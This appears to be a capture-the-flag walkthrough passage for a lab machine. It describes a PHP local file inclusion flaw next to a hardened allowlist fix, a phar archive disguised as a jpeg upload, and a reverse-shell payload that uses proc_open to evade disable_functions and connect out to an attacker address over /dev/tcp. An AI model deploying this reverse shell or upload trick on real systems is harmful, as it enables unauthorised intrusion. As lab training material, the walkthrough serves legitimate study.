Foothold
Local File Inclusion

The page sets direct access to false, then reads the page parameter.
If the page value does not contain /bin, usr, home, var, etc., it appends .php to the page variable and includes it.
Otherwise, it includes checker.php.
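Added example, not the target's source: a reconstruction of the include logic the notes describe (a substring denylist on the page parameter with .php appended) beside an allowlisted version that a defender would ship instead. The page names and base directory are assumed.

```php
<?php
// Vulnerable shape (assumed reconstruction of the behaviour described above):
// a substring denylist is not a path-safety check, and anything that passes it
// gets ".php" appended and is included as-is.
function include_page_denylist(string $page): string {
    foreach (['/bin', 'usr', 'home', 'var', 'etc'] as $bad) {
        if (str_contains($page, $bad)) {
            return 'checker.php';      // rejected: fall back to the default page
        }
    }
    return $page . '.php';             // everything else is included verbatim
}

// Hardened shape: only a fixed set of page names is accepted, and the resolved
// path must still sit inside the intended directory after realpath().
function include_page_allowlist(string $page, string $baseDir): ?string {
    $allowed = ['home', 'about', 'contact'];   // assumed page names
    if (!in_array($page, $allowed, true)) {
        return null;                           // unknown page: refuse
    }
    $root = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    // realpath() returns false for missing files; the prefix check rejects any
    // resolved path that left $baseDir through a symlink or traversal.
    if ($root === false || $real === false
        || !str_starts_with($real, $root . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $real;
}

// Constructed inputs for a quick local run (PHP 8+).
var_dump(include_page_denylist('admin'));
var_dump(include_page_denylist('../../etc/passwd'));
var_dump(include_page_allowlist('home', __DIR__));
var_dump(include_page_allowlist('../../x', __DIR__));
```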
Fuzzing

adot@kali:~/htb/oscp/updown$ zip payload.phar rev.php
adding: rev.php (deflated 60%)
adot@kali:~/htb/oscp/updown$ mv payload.phar payload.jpeg
adot@kali:~/htb/oscp/updown$ file payload.jpeg
payload.jpeg: Zip archive data, at least v2.0 to extract, compression method=deflate
system, exec and shell_exec are all disabled functions (disable_functions), so we can't execute system commands through them.
Add header to dfunc


https://gist.github.com/noobpk/33e4318c7533f32d6a7ce096bc0457b7#file-reverse-shell-php-L62
<?php
// proc_open is not on the disable_functions list, so it is used here instead
// of system/exec/shell_exec. The descriptor spec wires stdin, stdout and
// stderr of the child process to pipes.
$descspec = array(
    0 => array("pipe", "r"),   // stdin
    1 => array("pipe", "w"),   // stdout
    2 => array("pipe", "w")    // stderr
);
$cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/1337 0>&1'";
$proc = proc_open($cmd, $descspec, $pipes);
